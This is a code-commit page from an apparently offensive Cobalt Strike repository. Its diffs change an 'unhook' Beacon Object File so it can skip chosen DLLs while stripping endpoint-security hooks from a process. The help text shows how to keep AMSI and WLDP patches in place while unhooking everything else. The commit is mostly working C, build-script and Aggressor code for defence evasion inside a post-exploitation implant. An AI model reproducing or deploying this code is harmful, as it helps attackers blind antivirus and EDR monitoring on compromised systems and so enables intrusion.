Merge pull request #1 from mgeeky/master

Specify modules that should not be unhooked
Cobalt-Strike · Oct 4, 2021 · 3ec78b3 · 3ec78b3
2 parents fa3c8d8 + be91210
commit 3ec78b3
Show file tree

Hide file tree

Showing 6 changed files with 51 additions and 6 deletions.
diff --git a/make.bat b/make.bat
@@ -1,5 +1,6 @@
 @echo off
 set PLAT="x86"
-IF "%Platform%"=="x64" set PLAT="x64"
+cl.exe /GS- /nologo /Od /Oi /c /Isrc /I"C:\Program Files (x86)\Windows Kits\10\Include\10.0.22000.0\um" /I"C:\Program Files (x86)\Windows Kits\10\Include\10.0.22000.0\shared" /I"C:\Program Files (x86)\Windows Kits\10\Include\10.0.22000.0\ucrt" src\unhook.c /Founhook.%PLAT%.o
 
-cl.exe /GS- /nologo /Od /Oi /c /Isrc src\unhook.c /Founhook.%PLAT%.o
+set PLAT="x64"
+cl.exe /GS- /nologo /Od /Oi /c /Isrc /I"C:\Program Files (x86)\Windows Kits\10\Include\10.0.22000.0\um" /I"C:\Program Files (x86)\Windows Kits\10\Include\10.0.22000.0\shared" /I"C:\Program Files (x86)\Windows Kits\10\Include\10.0.22000.0\ucrt" src\unhook.c /Founhook.%PLAT%.o
diff --git a/src/refresh.c b/src/refresh.c
@@ -39,15 +39,43 @@ void RefreshPE(void * buffer, char* stomp)
     PLDR_DATA_TABLE_ENTRY pLdteHead = NULL;
     PLDR_DATA_TABLE_ENTRY pLdteCurrent = NULL;
 
-    size_t beaconDllLength = strlen(stomp);
+    char skipModules[32][64];
+    size_t modulesToSkip = 0;
+
+    for(size_t i = 0; i < 32; i++) {
+        MSVCRT$memset(&skipModules[i], 0, 64);
+    }
+
+    char *comma = MSVCRT$strtok(stomp, ",");
+
+    if(comma != NULL) {
+        while(comma != NULL) {
+            MSVCRT$strncpy(skipModules[modulesToSkip++], comma, 63);
+            comma = MSVCRT$strtok(NULL, ",");
+        }
+    }
+    else {
+        MSVCRT$strncpy(skipModules[modulesToSkip++], stomp, 63);
+    }
 
     dprintf("[REFRESH] Running DLLRefresher");
 
     pLdteHead = GetInMemoryOrderModuleList();
     pLdteCurrent = pLdteHead;
 
     do {
-        if (pLdteCurrent->FullDllName.Length > 2 && !IsBeaconDLL(stomp, beaconDllLength, pLdteCurrent->BaseDllName.pBuffer, pLdteCurrent->BaseDllName.Length))
+        BOOL dllToSkip = FALSE;
+
+        for(size_t i = 0; i < modulesToSkip; i++)
+        {
+            if(IsBeaconDLL(skipModules[i], MSVCRT$strlen(skipModules[i]), pLdteCurrent->BaseDllName.pBuffer, pLdteCurrent->BaseDllName.Length))
+            {
+                dllToSkip = TRUE;
+                break;
+            }
+        }
+
+        if (pLdteCurrent->FullDllName.Length > 2 && !dllToSkip)
         {
             wszFullDllName = pLdteCurrent->FullDllName.pBuffer;
             wszBaseDllName = pLdteCurrent->BaseDllName.pBuffer;

diff --git a/src/unhook.h b/src/unhook.h
@@ -19,7 +19,12 @@ DECLSPEC_IMPORT void     __cdecl  MSVCRT$free(void *_Memory);
 DECLSPEC_IMPORT errno_t  __cdecl  MSVCRT$mbstowcs_s(size_t *_PtNumOfCharConverted,wchar_t *_DstBuf,size_t _SizeInWords,const char *_SrcBuf,size_t _MaxCount);
 DECLSPEC_IMPORT int      __cdecl  MSVCRT$memcmp(const void *_Buf1,const void *_Buf2,size_t _Size);
 DECLSPEC_IMPORT size_t   __cdecl  MSVCRT$strnlen(const char *_Str,size_t _MaxCount);
+DECLSPEC_IMPORT size_t   __cdecl  MSVCRT$strlen(const char *_Str);
 DECLSPEC_IMPORT char *   __cdecl  MSVCRT$strstr(const char *_Str,const char *_SubStr);
+DECLSPEC_IMPORT char *   __cdecl  MSVCRT$strchr(const char * str, int character);
+DECLSPEC_IMPORT char *   __cdecl  MSVCRT$strtok ( char * str, const char * delimiters );
+DECLSPEC_IMPORT char *   __cdecl  MSVCRT$strncpy(char *_Str, const char *_SubStr, size_t num);
+DECLSPEC_IMPORT void *   __cdecl  MSVCRT$memset(void * ptr, int value, size_t num);
 DECLSPEC_IMPORT int      __cdecl  MSVCRT$vsprintf_s(char *buffer, size_t numberOfElements, const char *format, ...);
 
 #define _wcsnicmp MSVCRT$_wcsnicmp

diff --git a/unhook.cna b/unhook.cna
@@ -8,6 +8,17 @@ alias unhook {
 	# everything. We don't want that. A nice improvement would ask unhooker to skip stomped module.
 	$stomp = [data_query("metadata")["c2profile"] getString: ".stage.module_ $+ $barch"];
 
+	if(size(@_) > 1) {
+		while(size(@_) > 1) {
+			$mod = lc([pop(@_) trim]);
+			if ('*.dll' !iswm $mod) {
+				$mod .= '.dll'
+			}
+
+			$stomp = $stomp . "," . $mod;
+		}
+	}
+
 	# read in the right BOF file
 	$handle = openf(script_resource("unhook. $+ $barch $+ .o"));
 	$data   = readb($handle, -1);
@@ -16,7 +27,7 @@ alias unhook {
 	# pack the arguments
 	$args = bof_pack($1, "z", $stomp);
 
-	btask($1, "Running unhook");
+	btask($1, "Running unhook.\n    Will skip these modules (first is stomped): " . join(', ', split(',', $stomp)));
 
 	# run it.. 
 	beacon_inline_execute($1, $data, "go", $args);
@@ -25,4 +36,4 @@ alias unhook {
 beacon_command_register(
 	"unhook", 
 	"remove hooks from DLLs in this process", 
-	"Synopsis: unhook\n\nAttempt to remove hooks.");
+	"Synopsis: unhook [[skip-module1] [... [skip-moduleN]]]\n\nAttempt to remove hooks from all DLLs except from modules specified as optional parameters.\nExample use:\n\tbeacon> unhook amsi wldp\nwill not unhook amsi.dll and wldp.dll that might have been intentionally patched by our tooling.");
diff --git a/unhook.x64.o b/unhook.x64.o
diff --git a/unhook.x86.o b/unhook.x86.o